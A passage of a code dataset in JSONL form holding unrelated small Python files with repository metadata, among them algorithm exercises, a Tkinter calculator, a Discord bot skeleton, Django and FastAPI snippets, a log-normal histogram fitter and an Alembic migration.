配列の中で過半数を占める数字の最初に出てきたインデックスを返す\n for idx, i in enumerate(A):\n if most_appear_num == i:\n return idx\n\n\n# 100%だけどわかりにくい\ndef solution(A: [int]) -> int:\n if len(A) == 0:\n return -1\n\n a = [(i, v) for i, v in enumerate(A)]\n a.sort(key=lambda x: x[1])\n\n max_count = 0\n pre_i, pre_v = a[0]\n max_value_index = pre_i\n\n count = 0\n for i, v in a:\n if v == 
pre_v:\n count += 1\n else:\n if count > max_count:\n max_count = count\n max_value_index = pre_i\n count = 1\n pre_i, pre_v = i, v\n\n if count > max_count:\n max_count = count\n max_value_index = pre_i\n\n return max_value_index if max_count > len(A) / 2 else -1\n","repo_name":"mizutaninaoki/AtCoderPractice","sub_path":"codility/lessons/L08_dominator.py","file_name":"L08_dominator.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17455061618","text":"#https://www.acmicpc.net/problem/1141\nn = int(input())\nwords = []\nfor _ in range(n):\n words.append(input())\nwords.sort(reverse=True)\nX =[]\nfor word in words:\n check = True\n for x in X:\n if x.startswith(word):\n check = False \n if check:\n X.append(word)\nprint(len(X))\n","repo_name":"apple3285/Programing_training","sub_path":"백준_문자열-실버-문제-모음/65-접두사.py","file_name":"65-접두사.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16553881991","text":"\"\"\"\nQuicksort -- sorting algorithm using divide-and-conquer\n INPUT\n array\n OUTPUT\n array ordered in ascending order\n RUNTIME\n O(n*log n) - time\n O(n) - space\n\"\"\"\n\ndef quicksort(arr):\n # base case\n if len(arr) < 2:\n return arr\n # choose first element as pivot\n pivot = arr[0]\n # partition arr\n left = []\n right = []\n for i in range(1, len(arr)):\n if arr[i] <= pivot:\n left.append(arr[i])\n else:\n right.append(arr[i])\n # inductive return\n return quicksort(left) + [pivot] + quicksort(right)\n\ntest = [8, 5, 7, 1, 9, 3]\nprint(quicksort(test))\ntest2 = [5, 3, 6, 2, 10]\nprint(quicksort(test2))","repo_name":"calwoo/python-algos-and-ds","sub_path":"sorting/quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35785945632","text":"from tkinter import *\nfrom tkinter.ttk import *\n\nroot = Tk()\nroot.title(\"Demo App\")\nroot.geometry('500x50')\n\nframe = Frame(root)\nframe.pack()\n\nlabel = Label(frame, text=\"Hi All!\")\nlabel.pack()\n\nbutton = Button(frame, text=\"Close me!\", command=root.destroy)\nbutton.pack(side='top')\n\nroot.mainloop()\n","repo_name":"andreio16/bandwidth_monitor","sub_path":"demo_tk.py","file_name":"demo_tk.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33552828580","text":"# using python3\n\nimport sys\nimport json\nimport numpy as np\nfrom sklearn.manifold import TSNE\n\ndef get_interest_list_from_popular(file_path):\n interest_list = []\n with open(file_path, 'r') as f:\n obj_list = json.load(f)\n for obj in obj_list:\n interest_list.append(obj['app_title'])\n print(interest_list)\n return interest_list\n\nINTEREST_LIST = [\n 'Kik',\n 'LINE: Free Calls & Messages',\n 'Skype - free IM & video calls',\n 'Messenger',\n 'WhatsUp Messenger',\n 'WeChat',\n 'ZALORA Fashion Shopping',\n 'Uber',\n 'NBA 2K17',\n 'CCleaner',\n 'Cleaner',\n 'Firefox Browser fast & private',\n 'Opera browser - latest news',\n 'Chrome Dev',\n 'UC Browser Mini-Tiny and Fast',\n \"Facebook\",\n \"Instagram\"\n]\n\nINTEREST_LIST = get_interest_list_from_popular(\"../data/popular.json\")\n\n# show default usage to simply use\nif len(sys.argv) != 6:\n print('default usage:')\n print(\"\"\"python3 make_web_use_app.py 
../save_vector/app_vector.npy ../data/training/train_index_map.npy ../data/training/index_app_map ./app_emb_txt.js ./app_name.js\"\"\")\n\n# setting reading and writing files\napp_vector_path = sys.argv[1]\ntrain_index_map_path = sys.argv[2] # 我猜明天要嘛用 CNN 的要嘛用 RNN 的,因此就都要這個檔案\nindex_app_map_path = sys.argv[3]\napp_emb_text_path = sys.argv[4] # 這是 output\napp_name_path = sys.argv[5] # 這是 output\n\n# read all necessary input file\nall_app_vector_list = np.loadtxt(app_vector_path) # all 代表全部的,row 有重複\nrow_to_app_id_list = np.loadtxt(train_index_map_path)\nfor index in range(0, len(row_to_app_id_list)):\n row_to_app_id_list[index] = int(row_to_app_id_list[index])\nwith open(index_app_map_path, 'r') as f_j:\n index_to_app_map = json.load(f_j)\n\n# make app_id_to_row_map\napp_id_to_row_map = {}\nadded_list = []\nrow_id = 0\nfor app_id in row_to_app_id_list:\n if app_id not in added_list:\n added_list.append(app_id)\n app_id_to_row_map[str(int(app_id))] = int(row_id)\n row_id += 1\ndel row_to_app_id_list\ndel added_list\n\n# reductino and make a app_to_vector dict\n# 之所以要一起做是因為 reduction 只吃 list\napp_name_list = []\napp_vector_list = []\nfor app_index_string in index_to_app_map:\n try:\n app_name = index_to_app_map[app_index_string]\n app_vector = all_app_vector_list[app_id_to_row_map[app_index_string]]\n app_name_list.append(app_name)\n app_vector_list.append(app_vector)\n except:\n pass\nprint('len of app_name_list: {}, len of app_vector_list: {}'.format(len(app_name_list), len(app_vector_list)))\n\n# dim-reduction\ntsne = TSNE(n_components=2, random_state=0)\nnp.set_printoptions(suppress=True)\napp_vector_list = tsne.fit_transform(app_vector_list)\n\n# make app_to_vector_map\napp_to_vector_map = {}\nfor app_name, app_vector in zip(app_name_list, app_vector_list):\n # 每個 tsne 出來的是 ndarray 要把她變回 python list 才能給 json\n app_to_vector_map[app_name] = [app_vector[0], app_vector[1]]\ndel app_vector_list\n\n# output_app_vector_map 是要 output 的\noutput_app_vector_map = {}\noutput_app_name_list = []\n\n# 把 INTEREST_LIST 裡面的加進去\nfor app in INTEREST_LIST:\n if app not in output_app_name_list:\n try:\n output_app_vector_map[app] = app_to_vector_map[app]\n output_app_name_list.append(app)\n except:\n pass\n\ndel app_to_vector_map\ndel app_name_list\n\n# write to output\nwith open(app_emb_text_path, 'w') as f_text, open(app_name_path, 'w') as f_name:\n f_text.write('app_emb = ')\n f_name.write('app_name_list = ')\n json.dump(output_app_vector_map, f_text)\n json.dump(output_app_name_list, f_name)\n\n","repo_name":"b02902026/appseq_embedding_prediction","sub_path":"appemb/web/make_web_use_app.py","file_name":"make_web_use_app.py","file_ext":"py","file_size_in_byte":3696,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"43800281357","text":"from pathlib import Path\nfrom dotenv import load_dotenv\nimport discord\nfrom discord.ext import commands\nimport os\nimport traceback\nimport sys\n\nMY_DIR = Path(__file__).parent\n\nload_dotenv()\n\nTOKEN: str = os.getenv(\"token\")\n\nintents = discord.Intents.default()\nintents.members = True\nintents.messages = True\nintents.message_content = True\nintents.bans = True\n\n\nclass Bot(commands.Bot):\n\n # Initializes needed data\n def __init__(self) -> None:\n super().__init__(command_prefix='!', intents=intents,\n activity=discord.Activity(name=\"/buy\",\n type=discord.ActivityType.watching),\n status=discord.Status.dnd)\n\n # def exception_handler(exctype, value, traceback):\n # except AttributeError:\n # 
raise InvalidTable\n #\n # sys.__excepthook__(exctype, value, traceback)\n\n\n # Loading all cogs\n async def setup_hook(self) -> None:\n\n # sys.excepthook = self.exception_handler\n for filename in os.listdir(MY_DIR / \"cogs\"):\n if os.path.isfile(os.path.join(MY_DIR / \"cogs\", filename)):\n\n try:\n if filename.endswith(\".py\"):\n cog = f\"checkmate.cogs.{filename[:-3]}\"\n await self.load_extension(cog)\n except Exception as e:\n print(f\"Failed to load cog {filename}\")\n traceback.print_exc()\n\n\n\n\n# Creates instance of the bot and then runs it\nclient = Bot()\n\nclient.remove_command('help')\n\n\n@client.command()\n@commands.is_owner()\nasync def reload(ctx, cog_name) -> None:\n \"\"\"Reloads a cog\"\"\"\n try:\n await client.reload_extension(f\"zando.cogs.{cog_name}\")\n await ctx.send(f\"Reloaded cog: {cog_name}\")\n except Exception as e:\n await ctx.send(f\"Error: {e}\")\n\n\nclient.run(TOKEN)\n","repo_name":"Canttuchdiz/checkmate_bot","sub_path":"checkmate/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"69920137770","text":"from fastapi import APIRouter\n\nfrom src.blockchain import Blockchain\nfrom src.model import NewBlock, Transaction\n\nrouter = APIRouter()\nbc = Blockchain()\n\n@router.get(\"/last-block\")\nasync def get_last_block():\n return bc.last_block\n\n@router.post(\"/new-block\")\nasync def new_block(block: NewBlock):\n return bc.new_block(block.proof, block.previous_hash)\n\n@router.post(\"/transaction\")\nasync def new_transaction(transaction: Transaction):\n return bc.new_transaction(transaction.sender, transaction.recipient, transaction.amount)\n\n","repo_name":"jakpop/crypto-exercises","sub_path":"blockchain/src/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16820057488","text":"import matplotlib.pyplot as plt\n\nif __name__ == '__main__':\n peaks = []\n rr = []\n raw = []\n movavg = []\n\n with open('HRDATA.CSV', 'r') as f:\n data = f.read().splitlines()\n\n for line in data:\n #print(line)\n if line.startswith('P:'):\n l = line.split(':')[-1].split(',')\n peaks.append(int(l[0]))\n rr.append(int(l[1]))\n else:\n l = line.split(',')\n raw.append(int(l[0]))\n movavg.append(int(l[1]))\n\n plt.plot(raw)\n plt.plot(movavg)\n plt.scatter(peaks, [raw[x] for x in peaks], color='green', s=60)\n plt.show() \n","repo_name":"paulvangentcom/heartrate_analysis_Arduino","sub_path":"docs/source/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"1694507596","text":"from hoag.scripts.best_exp_decrease import get_alpha_for_exp_decrease\nimport numpy as np\n\nfrom jean_zay.submitit.general_submissions import get_cpu_executor\n\n\nexecutor = get_cpu_executor('step_size_schedule', timeout_hour=2, n_cpus=3, project='hoag')\nsearch_space = np.linspace(0.75, 0.85, 80)\n\n\njobs = []\nwith executor.batch():\n for exp_decrease in search_space:\n job = executor.submit(\n get_alpha_for_exp_decrease,\n exp_decrease=exp_decrease,\n max_iter=100,\n )\n jobs.append(job)\n\nfor job, exp_decrease in zip(jobs, search_space):\n alpha, val_losses = job.result()\n print(exp_decrease, alpha, 
min(val_losses))","repo_name":"zaccharieramzi/submission-scripts","sub_path":"jean_zay/submitit/hoag/exp_decrease_selection.py","file_name":"exp_decrease_selection.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"925264437","text":"from typing import List, Union\n\nfrom nonetrip.compat import CQHttpError\nfrom nonetrip.compat import Event as CQEvent\nfrom nonetrip.compat import EventBus\n\nfrom . import NoneBot\nfrom .log import logger\nfrom .session import BaseSession\nfrom .typing import NoticeHandler_T, RequestHandler_T\n\n_bus = EventBus()\n\n\nclass EventHandler:\n \"\"\"INTERNAL API\"\"\"\n __slots__ = ('events', 'func')\n\n def __init__(self, events: List[str], func: Union[NoticeHandler_T,\n RequestHandler_T]):\n self.events = events\n self.func = func\n\n\nclass NoticeSession(BaseSession):\n __slots__ = ()\n\n def __init__(self, bot: NoneBot, event: CQEvent):\n super().__init__(bot, event)\n\n\nclass RequestSession(BaseSession):\n __slots__ = ()\n\n def __init__(self, bot: NoneBot, event: CQEvent):\n super().__init__(bot, event)\n\n async def approve(self, remark: str = '') -> None:\n \"\"\"\n Approve the request.\n\n :param remark: remark of friend (only works in friend request)\n \"\"\"\n try:\n await self.bot.call_action(action='.handle_quick_operation_async',\n self_id=self.event.self_id,\n context=self.event,\n operation={\n 'approve': True,\n 'remark': remark\n })\n except CQHttpError:\n pass\n\n async def reject(self, reason: str = '') -> None:\n \"\"\"\n Reject the request.\n\n :param reason: reason to reject (only works in group request)\n \"\"\"\n try:\n await self.bot.call_action(action='.handle_quick_operation_async',\n self_id=self.event.self_id,\n context=self.event,\n operation={\n 'approve': False,\n 'reason': reason\n })\n except CQHttpError:\n pass\n\n\nasync def handle_notice_or_request(bot: NoneBot, event: CQEvent) -> None:\n \"\"\"INTERNAL API\"\"\"\n if event.type == 'notice':\n _log_notice(event)\n session = NoticeSession(bot, event)\n else: # must be 'request'\n _log_request(event)\n session = RequestSession(bot, event)\n\n ev_name = event.name\n logger.debug(f'Emitting event: {ev_name}')\n try:\n await _bus.emit(ev_name, session)\n except Exception as e:\n logger.error(f'An exception occurred while handling event {ev_name}:')\n logger.exception(e)\n\n\ndef _log_notice(event: CQEvent) -> None:\n logger.info(f'Notice: {event}')\n\n\ndef _log_request(event: CQEvent) -> None:\n logger.info(f'Request: {event}')\n\n\n__all__ = [\n 'NoticeSession',\n 'RequestSession',\n]\n","repo_name":"nonebot/nonetrip","sub_path":"nonetrip/notice_request.py","file_name":"notice_request.py","file_ext":"py","file_size_in_byte":2976,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"73079633449","text":"from django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.urls import path\n\nfrom .views import (\n\tPostListView,\n\tPostDetailView,\n\tPostCreateView,\n\tPostUpdateView,\n\tPostDeleteView,\n\tUserPostListView\n)\n\napp_name = 'news'\nurlpatterns = [\n\tpath('', PostListView.as_view(), name='index'),\n\tpath('user/', UserPostListView.as_view(), name='user-posts'),\n\tpath('post//', PostDetailView.as_view(), name='post-detail'),\n\tpath('post/new/', PostCreateView.as_view(), name='post-create'),\n\tpath('post//update/', PostUpdateView.as_view(), 
name='post-update'),\n\tpath('post//delete/', PostDeleteView.as_view(), name='post-delete'),\n]\n\nif settings.DEBUG:\n\turlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","repo_name":"chitcomhub/website","sub_path":"news/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"15039683719","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 24 19:34:58 2023\n\n@author: benjaminlear\n\"\"\"\nimport numpy as np\nfrom pathlib import Path\nfrom lmfit import Model\nimport itertools\nfrom matplotlib import pyplot as plt\n\n#define the models we want to use...\ndef scaled_log_norm(x, A, mu, sd):\n return A * (x * sd * (2 * np.pi)**0.5)**(-1) * np.exp(-1*(np.log(x) - mu)**2 / (2 * sd**2))\n\n#used when formatting strings. \ndef find_first_index(num):\n for i, x in enumerate(num):\n if x != \"0\":\n n = i\n break\n return n\n\n#basically convert to geometric space, and then make sure numbers are long enough\ndef value_and_error(value, error):\n # convert to strings\n val = str(np.exp(value))\n u_err = str(np.exp(value + error) - np.exp(value))\n l_err = str(np.exp(value) - np.exp(value - error))\n #split value by decimal, and then by first non-zero\n valD, vald = val.split(\".\")\n u_errD, u_errd = u_err.split(\".\")\n l_errD, l_errd = l_err.split(\".\")\n \n #find the indices where we no longer have zeros\n n_val = find_first_index(vald)\n n_u_err = find_first_index(u_errd)\n n_l_err = find_first_index(l_errd)\n \n #find the longest string we wilol need\n n = max([n_val, n_u_err, n_l_err])\n \n #take the longest version, and join the strings, taking 2 extra indices. \n return f\"{valD}.{vald[:n+2]} (+{u_errD}.{u_errd[:n+2]}) (-{l_errD}.{l_errd[:n+2]})\"\n\n\n\n#make the model to be used in fiting\nln_model = Model(scaled_log_norm)\n\n\n'''This will use pysimplegui to get a list of files that can be fit\nimport PySimpleGUI as sg\nfilenames = sg.popup_get_file(\"Choose files\", multiple_files = True, file_types = '*.csv').split(\";\")\n'''\n\n# if you want, you can use the following: and you can create a list of files, each separated by a comma\nfilenames = [\n \"/Users/benjaminlear/My Drive/PennState/Research/Manuscripts/2019/Santina+Vadim/Silver/TEM/AgSC12NP 06152017.csv\"\n ]\n\n\nfor data_file in filenames:\n data_file = Path(data_file)\n \n # import data to plot as a numpy array\n lengths = np.loadtxt(\n data_file, \n delimiter = \",\", \n skiprows = 1, \n usecols = (1),\n unpack = True # this makes it return arrays for each column\n )\n \n # get stats in ln space, for estimating starting values...\n ln_lengths = np.log(lengths)\n ln_mean = np.mean(ln_lengths) \n \n ln_q75, ln_q25 = np.percentile(ln_lengths, [75 ,25])\n ln_iqr = ln_q75 = ln_q25\n ln_sd = ln_iqr / 1.35\n \n #bin data\n y_counts, x_edges = np.histogram(lengths, \n bins = \"auto\"\n )\n x_bins = []\n for x in enumerate(x_edges[:-1]):\n x_bins.append((x_edges[x[0]] + x_edges[x[0]+1])/2)\n \n x_bins = np.array(x_bins)\n \n y_density = y_counts / len(lengths)\n h_bin = x_bins[1]-x_bins[0]\n \n result = ln_model.fit(y_density, x = x_bins, A = 1, mu = ln_mean, sd = ln_sd, method = \"leastsq\")\n print(result.fit_report())\n \n x_sim = np.linspace(0.001, np.max(lengths)* 1.1, 1000)\n\n\n\n \n plt.bar(x_bins, y_density, edgecolor='white', width=h_bin, color = \"#d36027\")\n plt.plot(x_sim, scaled_log_norm(x_sim, result.best_values[\"A\"], 
result.best_values[\"mu\"], result.best_values[\"sd\"]), color = \"black\", linewidth = 3)\n plt.title(data_file.stem)\n plt.xlabel(\"diameter /nm\")\n plt.ylabel(\"density\")\n plt.xlim(0, max(x_bins) * 1.1)\n plt.ylim(0, max(y_density) * 1.1)\n plt.text(max(x_bins) * 1.05, max(y_density) * 1.05, \n f\"$\\mu$ = {value_and_error(result.params['mu'].value, result.params['mu'].stderr)} nm \\n $\\sigma$ = {value_and_error(result.params['sd'].value, result.params['sd'].stderr)} nm\",\n horizontalalignment = \"right\",\n verticalalignment = \"top\",\n color = \"black\"\n )\n plt.savefig(data_file.with_suffix('.fit.png'))\n plt.show()\n \n \n \n ''' PLOTLY BASED PLOTTING --- NOT WORKING YET ON PC.\n import kaleido\n import plotly\n #plot the data\n fig = plotly.graph_objects.Figure( #make a figure, specifying default layouts\n layout = dict(\n title=str(data_file.stem),\n template = \"simple_white\", \n colorway = plotly.colors.qualitative.Dark2,\n showlegend = False,\n xaxis = dict(\n title = \"size /nm\", \n range = [0, np.max(lengths) * 1.1]\n ),\n yaxis = dict(\n title = \"density\", \n range = [0, max(y_density)*1.1]\n )\n )\n )\n \n \n fig.add_bar(x = x_bins, y = y_density, width = h_bin) # add the data trace to the figure\n fig.add_scatter(x = x_sim, \n y = scaled_log_norm(x_sim, result.best_values[\"A\"], result.best_values[\"mu\"], result.best_values[\"sd\"]))\n\n\n # annotate with mean and sigma... but only use enough decimal places as needed by the error...\n fig.add_annotation(\n x=np.max(lengths)*0.8,\n y=np.max(y_density),\n xref=\"x\",\n yref=\"y\",\n text=f\"μ = {value_and_error(result.params['mu'].value, result.params['mu'].stderr)} nm\",\n showarrow=False,\n font=dict(\n family=\"Courier New, monospace\",\n size=16,\n color=\"#000000\"\n ),\n align=\"right\",\n )\n fig.add_annotation(\n x=np.max(lengths)*0.8,\n y=np.max(y_density)*0.9,\n xref=\"x\",\n yref=\"y\",\n text=f\"σ = {value_and_error(result.params['sd'].value, result.params['sd'].stderr)} nm\",\n showarrow=False,\n font=dict(\n family=\"Courier New, monospace\",\n size=16,\n color=\"#000000\"\n ),\n align=\"right\",\n )\n fig.show('svg') # this one will be viewable in spyder\n fig.write_image(data_file.with_suffix('.fit.png')) #write image\n '''\n \n \n \n # write the final stuff to a file \n g_mu = np.exp(result.params['mu'].value)\n g_mu_u = np.exp(result.params['mu'].value + result.params['mu'].stderr) - g_mu\n g_mu_l = g_mu - np.exp(result.params['mu'].value - result.params['mu'].stderr)\n \n g_sd = np.exp(result.params['sd'].value)\n g_sd_u = np.exp(result.params['sd'].value + result.params['sd'].stderr) - g_sd\n g_sd_l = g_sd - np.exp(result.params['sd'].value - result.params['sd'].stderr)\n to_write = []\n for i in itertools.zip_longest(\n lengths, \n x_bins, \n y_density,\n [\"A\", \"mu\", \"sigma\"],\n [result.params['A'].value, g_mu, g_sd],\n [result.params['A'].stderr, g_mu_u, g_sd_u],\n [result.params['A'].stderr, g_mu_l, g_mu_u],\n [f\"{result.params['A'].value} * (x * {result.params['sd'].value} * (2 * 3.14159)**0.5)**(-1) * exp(-1*(log(x) - {result.params['mu'].value})**2 / (2 * {result.params['sd'].value}**2))\"]\n ):\n to_write.append(i)\n \n with open(data_file.with_suffix('.fit.csv'), \"w\") as f:\n f.write(\"Lengths, bin centers, density, parameters, values, upper error, lower error, equation \\n\")\n for row in to_write:\n for entry in row:\n if entry != None:\n f.write(str(entry))\n f.write(\",\")\n 
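        # Row complete: the inner loop wrote each non-None cell and one comma
        # per column, so the next write just terminates the CSV line.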
f.write(\"\\n\")\n","repo_name":"TheLearLab/lognormal-fitter","sub_path":"fitter.py","file_name":"fitter.py","file_ext":"py","file_size_in_byte":7487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5508101816","text":"from django.contrib.auth.models import User\nfrom rest_framework import serializers\nfrom rest_framework.exceptions import ValidationError\n\nfrom posts.models import Post\n\n\nclass PostSerializer(serializers.ModelSerializer):\n author = serializers.PrimaryKeyRelatedField(queryset=User.objects.all())\n\n class Meta:\n model = Post\n fields = (\n 'author',\n 'title',\n 'text',\n 'creation_datetime',\n )\n\n def validate(self, data):\n validated_data = super().validate(data)\n if validated_data['title'] == 'Serializer Invalid Title':\n raise ValidationError({'title': 'Invalid title at the serializer level.'})\n return validated_data\n","repo_name":"Hipo/hipo-drf-exceptions","sub_path":"test_project/posts/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"252379768","text":"#!/usr/bin/python3\n\n\nimport re\n\n# open input file\nwith open('input.txt', 'r') as f:\n data = f.readlines() # to remove the last carriage return\n\n\nregex = r\"\\d+\"\n\nchecksum = 0\nfor line in data:\n row = re.findall(regex, line)\n\n # convert strings into int\n row = [int(x) for x in row]\n\n checksum += max(row) - min(row)\n\nprint(checksum)\n","repo_name":"gmnr/advent-of-code","sub_path":"2017/02/day02.py","file_name":"day02.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30231208554","text":"def heap_maxify(array, parent, heap_size):\n l = parent * 2 + 1\n p = parent * 2 + 2\n largest = parent\n if l < heap_size and array[l] > array[largest]:\n largest = l\n if p < heap_size and array[p] > array[largest]:\n largest = p\n if largest != parent:\n temp = array[parent]\n array[parent] = array[largest]\n array[largest] = temp\n heap_maxify(array, largest, heap_size)\n\n\ndef build_max_heap(array):\n for i in range(len(array) // 2 - 1, -1, -1):\n heap_maxify(array, i, len(array))\n\n\ndef heap_sort(array):\n build_max_heap(array)\n for heap_size in range(len(array) - 1, 0, -1):\n temp = array[0]\n array[0] = array[heap_size]\n array[heap_size] = temp\n heap_maxify(array, 0, heap_size)\n\n\narray=[13.0, -3.0, -25.0, 20.0, -3.0, -16.0, -23.0, 18.0, 20.0, -7.0, 12.0, -5.0, -22.0, 15.0, -4.0, 7.0]\nprint(array)\nheap_sort(array)\nprint(array)","repo_name":"MaciejWasilewski/IntroToAlgorithm","sub_path":"Sorting/Heap_sort/python/heap_sort.py","file_name":"heap_sort.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8798353789","text":"S = input()\nT = input()\n# j = 0\n# if len(S) > len(T):\n# print(\"No\")\n# exit()\n# for i,t in enumerate(T):\n# if j < len(S) and t == S[j]:\n# j += 1\n# continue\n# else:\n# if j < len(S) and j >= 2 and S[j-1] == t and S[j-2] == t:\n# continue\n# else:\n# print(\"No\")\n# exit()\n# if j == len(S):\n# print(\"Yes\")\n# else:\n# print(\"No\")\n\nnow = S[0]\ncnt = 0\ntpos = 0\nfor s in S:\n if s == now:\n cnt += 1\n else:\n if T[tpos] != now:\n print(\"No\")\n exit()\n else:\n cntt = 0\n while tpos < len(T) and now == T[tpos]:\n cntt += 1\n tpos += 1\n if cnt != 
cntt and (cnt < 2 or cntt <= cnt):\n print(\"No\")\n exit()\n now = s\n cnt = 1\ncntt = 0\nwhile tpos < len(T) and now == T[tpos]:\n cntt += 1\n tpos += 1\nif cnt != cntt and (cnt < 2 or cntt <= cnt):\n print(\"No\")\n exit()\nif tpos == len(T):\n print(\"Yes\")\nelse:\n print(\"No\")","repo_name":"shimamura10/Atcoder","sub_path":"過去問/ABC259/ABC259c.py","file_name":"ABC259c.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37262161083","text":"from tkinter import *\n\nexpression = \"\"\n\n\ndef press(num):\n global expression\n expression = expression + str(num)\n equation.set(expression)\n\n\ndef equalpress():\n try:\n global expression\n total = str(eval(equation.get()))\n equation.set(total)\n expression = \"\"\n except:\n equation.set(\"ERROR\")\n expression = \"\"\n\n\ndef clear():\n global expression\n expression = \"\"\n equation.set(\"\")\n\n\ndef but(source, side, text, command=None):\n store = Button(source, text=text, fg=\"black\", bg=\"red\", relief=RAISED, command=command)\n store.pack(side=side, expand=YES, fill=BOTH)\n return store\n\n\ndef cal(source, side):\n steve = Frame(source, borderwidth=4, bd=4, bg=\"blue\")\n steve.pack(side=side, expand=YES, fill=BOTH)\n\n\nif __name__ == \"__main__\":\n gui = Tk()\n gui.configure(bg=\"blue\")\n gui.option_add('*Font', 'arial 14 bold')\n gui.title(\"My Calculator\")\n equation = StringVar()\n expression_field = Entry(gui, relief=RIDGE, textvariable=equation, justify='left', bd=20, bg=\"dark red\")\n expression_field.pack(side=TOP, expand=YES, fill=BOTH)\n equation.set(\"enter your expression\")\n\n but(gui, TOP, \"CE\", command=clear)\n but(gui, TOP, \"C\", command=clear)\n\n equal = but(gui, TOP, \"=\", command=equalpress)\n\n for Num in (\"789/\", \"456*\", \"123-\", \"0.+()\"):\n tim = cal(gui, TOP)\n for But in Num:\n but(tim, LEFT, But,\n lambda store=equation, q=But: store.set(store.get() + q))\n\n gui.mainloop()\n","repo_name":"ebel-frank/python-projects","sub_path":"calculator2.py","file_name":"calculator2.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10863170889","text":"\"\"\"added projectupdate\n\nRevision ID: 1dd716b25acf\nRevises: 8aad0dc0fd2c\nCreate Date: 2023-04-15 14:42:05.939329\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '1dd716b25acf'\ndown_revision = '8aad0dc0fd2c'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('project_update',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('project_id', sa.Integer(), nullable=True),\n sa.Column('timestamp', sa.DateTime(), nullable=True),\n sa.Column('text', sa.Text(), nullable=True),\n sa.ForeignKeyConstraint(['project_id'], ['project.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n with op.batch_alter_table('project_update', schema=None) as batch_op:\n batch_op.create_index(batch_op.f('ix_project_update_timestamp'), ['timestamp'], unique=False)\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n with op.batch_alter_table('project_update', schema=None) as batch_op:\n batch_op.drop_index(batch_op.f('ix_project_update_timestamp'))\n\n op.drop_table('project_update')\n # ### end Alembic commands ###\n","repo_name":"rylansturm/RylanSturm.com","sub_path":"migrations/versions/1dd716b25acf_added_projectupdate.py","file_name":"1dd716b25acf_added_projectupdate.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70229766250","text":"from django.urls import include, path\nfrom rest_framework import routers\nfrom quickstart import views\nfrom django.contrib import admin\nfrom quickstart.views import QuestionViewSet, SectionsViewSet\n\nrouter = routers.DefaultRouter()\nrouter.register(r'users', views.UserViewSet)\nrouter.register(r'groups', views.GroupViewSet)\nrouter.register(r'questions', views.QuestionViewSet, basename=\"questions\")\nrouter.register(r'sections', views.SectionsViewSet, basename=\"sections\")\nrouter.register(r'answers', views.AnswersViewSet, basename=\"answers\")\nrouter.register(r'states', views.StatesViewSet, basename=\"states\")\nrouter.register(r'stateprograms', views.StateprogramsViewSet, basename=\"stateprograms\")\nrouter.register(r'questionsanswers', views.QuestionsAnswersViewSet, basename=\"questionsanswers\")\n\n# Wire up our API using automatic URL routing.\n# Additionally, we include login URLs for the browsable API.\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', include(router.urls)),\n path('api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n path(r'api/', include('quickstart.urls'))\n]","repo_name":"andrewadcock/django-mssql-api","sub_path":"api/basicapi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3285650778","text":"from flask import Flask, request, make_response, jsonify\nimport uuid\nfrom PyPDF2 import PdfMerger\nimport argparse\nimport os\nfrom 